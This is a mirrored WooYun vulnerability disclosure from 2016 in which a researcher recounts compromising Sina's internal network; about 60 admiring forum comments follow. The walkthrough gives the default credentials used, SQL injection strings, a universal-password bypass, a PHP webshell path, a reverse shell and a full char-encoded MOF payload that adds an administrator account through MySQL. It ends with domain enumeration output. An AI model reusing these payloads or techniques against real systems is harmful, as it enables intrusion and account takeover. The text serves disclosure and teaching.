对新浪的一次渗透测试

admin
admin
admin
109005
文章
90
评论
2017年5月2日08:30:54评论439 views字数 195阅读0分39秒阅读模式
摘要

2016-04-15: 细节已通知厂商并且等待厂商处理中
2016-04-15: 厂商已经确认,细节仅向厂商公开
2016-04-25: 细节向核心白帽子及相关领域专家公开
2016-05-05: 细节向普通白帽子公开
2016-05-15: 细节向实习白帽子公开
2016-05-30: 细节向公众公开

漏洞概要 关注数(254) 关注此漏洞

缺陷编号: WooYun-2016-196483

漏洞标题: 对新浪的一次渗透测试

相关厂商: 新浪

漏洞作者: if、so对新浪的一次渗透测试

提交时间: 2016-04-15 09:12

公开时间: 2016-05-30 15:10

漏洞类型: 成功的入侵事件

危害等级: 高

自评Rank: 20

漏洞状态: 厂商已经确认

漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系

Tags标签: 无

68人收藏

漏洞详情

披露状态:

2016-04-15: 细节已通知厂商并且等待厂商处理中
2016-04-15: 厂商已经确认,细节仅向厂商公开
2016-04-25: 细节向核心白帽子及相关领域专家公开
2016-05-05: 细节向普通白帽子公开
2016-05-15: 细节向实习白帽子公开
2016-05-30: 细节向公众公开

简要描述:

@sky,终于进入新浪内网

详细说明:

想漫游新浪好久了。下班回家打开电脑,继续苦逼的尝试

看了一圈没有什么发现

继续把注意力放在staff.sina.com.cn这个域名

之前看过好多次,没什么问题,但是不代表一直没有问题

dialin.staff.sina.com.cn 这是一个外网的员工登陆口,爆破尝试失败

c段发现一处网络设备,是以前没有发现的,218.30.113.65

对新浪的一次渗透测试

basic 认证,设备名是arg,尝试弱口令 arg admin成功登陆

对新浪的一次渗透测试

发现ping功能,尝试ping内网邮件服务器

对新浪的一次渗透测试

找了sky看了下,发现ping处存在命令执行

对新浪的一次渗透测试

反弹shell

对新浪的一次渗透测试

由于是root权限,而且这台机器拥有公网ip

code 区域 
eth0      Link encap:Ethernet  HWaddr 00:30:18:c6:38:99  
           inet addr:218.30.113.65  Bcast:218.30.113.127  Mask:255.255.255.192
           inet6 addr: fe80::230:18ff:fec6:3899/64 Scope:Link
           UP BROADCAST RUNNING  MTU:1500  Metric:1
           RX packets:3979542 errors:0 dropped:0 overruns:0 frame:0
           TX packets:97531 errors:0 dropped:0 overruns:0 carrier:0
           collisions:0 txqueuelen:1000 
           RX bytes:5414089145 (5.4 GB)  TX bytes:15440995 (15.4 MB)
           Memory:f7c00000-f7c1ffff

为了后续能方便快速的渗透,所以决定在这台机器上搭建pptp vpn作为跳板

成功搭建pptp vpn,简直是方便安全快速,远比新浪公司的方便,不要手机短信,不要token~

对新浪的一次渗透测试

对新浪的一次渗透测试

但是后来发现并不能和内网机器通讯

对新浪的一次渗透测试

想到可能做了隔离,发现机器所处c段可以访问

对新浪的一次渗透测试

开始尝试获取c段机器的权限

发现c段是新浪电视直播的生产环境

对新浪的一次渗透测试

存在大量漏洞

https://10.219.18.106/login.html dell openmanager

默认口令 root calvin

对新浪的一次渗透测试

https://10.219.18.101/designs/imm/index.php

默认用户名:USERID

默认密码:PASSW0RD

对新浪的一次渗透测试

注入漏洞

code 区域 
http://10.219.18.61/edit.php?input_id=5%27%20and%20%271%27=%272
code 区域 
POST /index.php HTTP/1.1
 Host: 10.219.18.63
 Proxy-Connection: keep-alive
 Content-Length: 21
 Cache-Control: max-age=0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
 Origin: http://10.219.18.63
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36
 Content-Type: application/x-www-form-urlencoded
 Referer: http://10.219.18.63/index.php
 Accept-Encoding: gzip, deflate
 Accept-Language: zh-CN,zh;q=0.8
 Cookie: PHPSESSID=tvocg2n5k6dlqf6v3jj8otr4u0
 
 username=1&password=1

sqllite注入

对新浪的一次渗透测试

getshell

code 区域 
http://10.219.18.63/index.php

存在万能密码admin' or '1'='1

登入后台

对新浪的一次渗透测试

上传php webshell

code 区域 
http://10.219.18.62/watermark/c11.php

cmd

对新浪的一次渗透测试

发现此台机器与核心内网相连

对新浪的一次渗透测试

对新浪的一次渗透测试

畅通无阻

使用http代理访问

对新浪的一次渗透测试

对新浪的一次渗透测试

对新浪的一次渗透测试

终于见到了想见好久的新浪内网exchange邮件服务器

但是,问题来了,通过http代理问题比较多,速度,稳定性,会话超时等等,所以需要一个更稳定的控制端来对内网进行渗透

所以要在c段渗透下一台windows机器

扫了下端口

对新浪的一次渗透测试

这些肯定是windows机器了

其中10.219.18.8还开启了mysql服务

对新浪的一次渗透测试

并且存在root root弱口令

并且10.219.18.8还是一台windows 2003的机器

对新浪的一次渗透测试

正好可以利用MOF来获取系统权限

转码导出文件到c:/windows/system32/wbem/mof/下面

code 区域 
select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile  'c:/windows/system32/wbem/mof/nullevt.mof';

等待几秒,成功进入3389

对新浪的一次渗透测试

对新浪的一次渗透测试

发现一个密码通杀,登陆多台机器

对新浪的一次渗透测试

对新浪的一次渗透测试

对新浪的一次渗透测试

发现和核心内网相连!

对新浪的一次渗透测试

对新浪的一次渗透测试

对新浪的一次渗透测试

并且处于新浪内网核心staff域中

code 区域 
C:/Documents and Settings/admin>net view /domain
 Domain
 
 -------------------------------------------------------------------------------
 STAFF
 WORKGROUP
 命令成功完成。
 
 
 C:/Documents and Settings/admin>

天时地利人和,稳定的外网跳板,方便的内网操作环境,花上一点时间,内网渗透会很精彩

随便在github上找点密码都能连上,内网邮箱弱口令还会少吗?

code 区域 
192.168.145.117 1433 zhuku

对新浪的一次渗透测试

漏洞证明:

如上所示,搞太久了,接近10个小时了,后续也比较简单,鉴于关键系统有多重验证,可以把注意力放在域渗透上。没有力气往下继续深入了也感谢sky大半夜和我一起撸站

修复方案:

版权声明:转载请注明来源 if、so@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2016-04-15 15:00

厂商回复:

感谢关注新浪安全,问题修复中。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

  1. 2016-04-15 09:13 | Pzacker ( 实习白帽子 | Rank:92 漏洞数:34 )

    1

    为何 你这么屌

  2. 2016-04-15 09:15 | 陆由乙 ( 普通白帽子 | Rank:620 漏洞数:137 | 我是突突兔!)

    1

    又来。

  3. 2016-04-15 09:15 | 欧冠狂魔阿森纳 ( 实习白帽子 | Rank:87 漏洞数:37 | 静静的看你们装逼)

    1

    又来

  4. 2016-04-15 09:17 | 小挺 ( 实习白帽子 | Rank:45 漏洞数:15 | 在读大三学生,来找工作!)

    1

    又来

  5. 2016-04-15 09:23 | Taro ( 普通白帽子 | Rank:349 漏洞数:86 | 走向最远的方向,哪怕前路迷茫;抱着最大的...)

    1

    又来

  6. 2016-04-15 09:26 | px1624 ( 普通白帽子 | Rank:1171 漏洞数:208 | px1624)

    1

    渗透之王~

  7. 2016-04-15 09:27 | 路人毛 ( 普通白帽子 | Rank:157 漏洞数:64 | 要想Rank给高,标题一定得屌)

    1

    又来

  8. 2016-04-15 09:33 | 菜鸟小Q ( 普通白帽子 | Rank:205 漏洞数:56 | 坚定自己的信仰并一直做下去......)

    1

    又来

  9. 2016-04-15 09:34 | 带我玩 ( 路人 | Rank:16 漏洞数:8 | 带我玩)

    1

    大牛又在玩新浪啊

  10. 2016-04-15 09:34 | answer 对新浪的一次渗透测试 ( 普通白帽子 | Rank:453 漏洞数:54 | 答案)

    1

    溜溜

  11. 2016-04-15 09:51 | loli 对新浪的一次渗透测试 ( 普通白帽子 | Rank:649 漏洞数:59 | 每个男人心中都住着一个叫小红的88号技师。)

    1

    应该打个雷

  12. 2016-04-15 09:53 | 隔壁小王 ( 普通白帽子 | Rank:111 漏洞数:30 )

    1

    又来

  13. 2016-04-15 09:57 | Coody 对新浪的一次渗透测试 ( 核心白帽子 | Rank:1809 漏洞数:214 | 不接单、不黑产;如遇冒名顶替接单收徒、绝...)

    1

    一发不可收拾

  14. 2016-04-15 09:58 | 未了 ( 路人 | Rank:2 漏洞数:3 )

    1

    6

  15. 2016-04-15 10:01 | 子非海绵宝宝 对新浪的一次渗透测试 ( 核心白帽子 | Rank:1413 漏洞数:148 | 发扬海绵宝宝的精神! 你不是海绵宝宝,你怎...)

    1

    又来

  16. 2016-04-15 10:04 | 心云 ( 普通白帽子 | Rank:534 漏洞数:146 | 有追求,才会有提高!尽快达到下一个目标!)

    1

    觉得又会打雷 赶快回家收衣服 哈哈哈哈哈哈!!!

  17. 2016-04-15 10:09 | Mayter ( 普通白帽子 | Rank:165 漏洞数:40 | 笼鸡有食汤锅近,野鹤无粮天地宽.)

    1

    又来

  18. 2016-04-15 10:19 | Ton7BrEak ( 普通白帽子 | Rank:350 漏洞数:70 | ☁ 我要继续努力!)

    1

    `````

  19. 2016-04-15 10:34 | 秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)

    1

    NB!

  20. 2016-04-15 10:41 | Mark0smith ( 普通白帽子 | Rank:176 漏洞数:71 )

    1

    666

  21. 2016-04-15 10:42 | B1gstar ( 实习白帽子 | Rank:90 漏洞数:24 | 向各位学习来了。)

    1

    小伙子,告诉我,你叫什么名字?是不是莲花乡的

  22. 2016-04-15 10:42 | dami ( 路人 | Rank:10 漏洞数:5 | 鸟鸟起飞)

    1

    如果NB!

  23. 2016-04-15 10:46 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

    1

    刚刚准备搞 你就发了

  24. 2016-04-15 11:01 | 带馅儿馒头 对新浪的一次渗透测试 ( 核心白帽子 | Rank:1399 漏洞数:157 | 心在,梦在)

    1

    膜拜

  25. 2016-04-15 11:08 | Fnut ( 普通白帽子 | Rank:112 漏洞数:28 | 大王叫我来巡山,巡完南山巡北山)

    1

    666

  26. 2016-04-15 11:13 | Jn· ( 路人 | Rank:30 漏洞数:14 | 本小菜很可爱,如果不服你TM来打我啊--哎呀...)

    1

    这是日穿的节奏啊...慢慢提交啊。。

  27. 2016-04-15 11:32 | 疯子 ( 普通白帽子 | Rank:259 漏洞数:45 | 世人笑我太疯癫,我笑世人看不穿~)

    1

    膜拜~

  28. 2016-04-15 11:40 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    1

    渗透牛人!

  29. 2016-04-15 11:47 | 我是壮丁 对新浪的一次渗透测试 ( 实习白帽子 | Rank:42 漏洞数:4 | 专业打酱油)

    1

    一觉醒来你就提交了。。。

  30. 2016-04-15 11:53 | 乌云小秘书 对新浪的一次渗透测试 ( 普通白帽子 | 还没有发布任何漏洞 | 第1!绝对不意气用事!第2!绝对不漏判任何一...)

    1

    差点点啊

  31. 2016-04-15 11:53 | if、so 对新浪的一次渗透测试 ( 核心白帽子 | Rank:1204 漏洞数:104 | Enjoy Hacking)

    1

    @我是壮丁 配的一手好vpn

  32. 2016-04-15 12:02 | 随风的风 ( 普通白帽子 | Rank:259 漏洞数:96 | 微信公众号:233sec 不定期分享各种漏洞思...)

    1

    没有雷啊。。。下次再争取雷啊

  33. 2016-04-15 12:05 | 我是壮丁 对新浪的一次渗透测试 ( 实习白帽子 | Rank:42 漏洞数:4 | 专业打酱油)

    1

    @if、so 我会抽时间写成自动化脚本的。。。。

  34. 2016-04-15 12:45 | 0h1in9e ( 实习白帽子 | Rank:68 漏洞数:23 | 林歌 | 峨眉山下修炼中的<网络安全></web开...)

    1

    nihaolihai ,dashen ,mobai a

  35. 2016-04-15 12:48 | hkcs ( 实习白帽子 | Rank:56 漏洞数:9 | 只是路过)

    1

    666666666666666666666666666666

  36. 2016-04-15 12:52 | 悟鸣 ( 路人 | Rank:24 漏洞数:6 | 鸡既鸣矣,朝既盈矣。)

    1

    指哪打哪 掐指一算大牛这渗透功底,少说也有十年了。。

  37. 2016-04-15 14:15 | monburan ( 路人 | Rank:6 漏洞数:3 | 对这个世界的知识充满好奇)

    1

    厉害厉害

  38. 2016-04-15 14:16 | Dusk ( 实习白帽子 | Rank:35 漏洞数:20 )

    1

    好枪

  39. 2016-04-15 14:27 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    1

    @Dusk 差点看成鸭子.

  40. 2016-04-15 14:41 | 中国Cold ( 实习白帽子 | Rank:57 漏洞数:24 | 服重任,行远道,正直而固者,轴也。)

    1

    为何 你这么屌

  41. 2016-04-15 14:44 | 猪猪侠 对新浪的一次渗透测试 ( 核心白帽子 | Rank:5372 漏洞数:415 | 你都有那么多超级棒棒糖了,还要自由干吗?)

    1

    5 RANK

  42. 2016-04-15 14:48 | scanf ( 核心白帽子 | Rank:1694 漏洞数:239 | 。)

    1

    vpn的问题吗?

  43. 2016-04-15 14:51 | 天朝 ( 路人 | Rank:15 漏洞数:1 | too young too simple)

    1

    5 RANK

  44. 2016-04-15 14:58 | autO_pw ( 实习白帽子 | Rank:81 漏洞数:25 | o_O``)

    1

    大兄弟,放学别走,后山等你,我们务必要交流交流渗♂透技巧。

  45. 2016-04-15 15:21 | if、so 对新浪的一次渗透测试 ( 核心白帽子 | Rank:1204 漏洞数:104 | Enjoy Hacking)

    1

    @猪猪侠 给了12,哈哈

  46. 2016-04-15 15:51 | 大亮 ( 普通白帽子 | Rank:386 漏洞数:73 | 小段子手)

    1

    你这么吊,你媳妇知道吗?

  47. 2016-04-15 16:00 | PiaCa ( 普通白帽子 | Rank:137 漏洞数:11 | 简单点! 啪......嚓~~)

    1

    真是越来越渣了

  48. 2016-04-15 17:10 | 玄道 ( 普通白帽子 | Rank:142 漏洞数:42 | 就是注入 就是注入 注入)

    1

    睡了一天 就看到了漏洞

  49. 2016-04-16 19:57 | blnxz ( 实习白帽子 | Rank:55 漏洞数:16 | 为了防止世界被破坏,为了维护世界的和平,...)

    1

    10 J Q .. A

  50. 2016-04-23 21:34 | 周小梦 ( 路人 | Rank:2 漏洞数:1 | 我一生都在浪也很不羁 你还有酒么 我还有...)

    0

    666

  51. 2016-05-20 11:08 | Ton7BrEak ( 普通白帽子 | Rank:350 漏洞数:70 | ☁ 我要继续努力!)

    0

    66666

  52. 2016-05-20 11:53 | 大师兄 ( 实习白帽子 | Rank:31 漏洞数:8 | 每日必关注乌云)

    0

    擦,要支付乌云币。好久没刷了。

  53. 2016-05-30 15:24 | hh88 ( 实习白帽子 | Rank:35 漏洞数:5 | Android开发与安全测试,web安全测试。)

    0

    为何 你这么屌

  54. 2016-05-30 16:40 | 无名 ( 实习白帽子 | Rank:41 漏洞数:9 | 我是一只小菜鸟呀,伊雅伊尔哟。)

    0

    一个弱口令引发的一场血案

  55. 2016-05-30 17:13 | 我真的是开开哥 ( 路人 | Rank:4 漏洞数:1 | 不敢写。)

    0

    弱口令我觉得就是看人品

  56. 2016-05-31 01:01 | 邪少 ( 实习白帽子 | Rank:98 漏洞数:18 | 百里长苏)

    0

    我只能说666666666666666666666666666666666666

  57. 2016-06-01 14:28 | Sai、 ( 路人 | Rank:14 漏洞数:4 | for fun……)

    0

    可怕,就快日穿了

  58. 2016-06-01 18:30 | 赵信 ( 路人 | Rank:2 漏洞数:1 | 一点寒芒先到,随后抢出如龙)

    0

    3389端口怎么破的?

  59. 2016-06-03 10:50 | 立志成为厨神的男人 ( 路人 | Rank:15 漏洞数:1 | 我饿了)

    0

    就看到一路弱口令畅通无阻哈哈

  60. 2016-06-08 11:21 | 榴莲精 ( 路人 | Rank:4 漏洞数:2 | 入坑了!!)

    0

    内网狂魔!

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin